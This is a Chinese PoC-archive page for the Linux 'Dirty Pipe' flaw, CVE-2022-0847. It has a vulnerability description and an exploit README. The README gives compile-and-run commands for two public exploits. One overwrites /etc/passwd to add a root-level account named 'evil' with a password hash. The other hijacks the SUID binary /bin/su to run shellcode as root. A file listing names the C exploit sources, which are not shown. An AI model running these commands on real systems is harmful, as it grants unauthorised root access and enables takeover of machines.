关联漏洞
标题:
Linux kernel 安全漏洞
(CVE-2022-0847)
描述:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 存在安全漏洞,该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化。非特权本地用户利用该漏洞可以提升权限至root。以下产品和版本受到影响:Linux Kernel 5.8-5.16.11、5.8-5.15.25、5.8-5.10.102。
介绍
# Dirty-Pipe-CVE-2022-0847-POCs
- Author: Max Kellermann max.kellermann@ionos.com
- Contributor: Bl4sty https://twitter.com/bl4sty
A new Linux vulnerability known as 'Dirty Pipe' allows local users to gain root privileges through publicly available exploits.
Today, security researcher Max Kellermann responsibly disclosed the 'Dirty Pipe' vulnerability and stated that it affects Linux Kernel 5.8 and later versions, even on Android devices.
The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root.
Kellerman discovered the bug after tracking down a bug that was corrupting web server access logs for one of his customers.
Then Bl4sty wrote another version. Instead of overwriting a file like /etc/passwd, it overwrites a user-specified SUID binary (like /bin/su), injecting shellcode that is then executed with privileged user (i.e. root) permissions.
## Exploit 1
```bash
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'
```
## Exploit 2
```bash
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su
```
For detailed use refer: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf
文件快照
[4.0K] /data/pocs/1f6fa54b7605bbcad2736e05a0945dc7675bd05b
├── [5.1K] PoC1.c
├── [8.2K] PoC2.c
└── [1.5K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。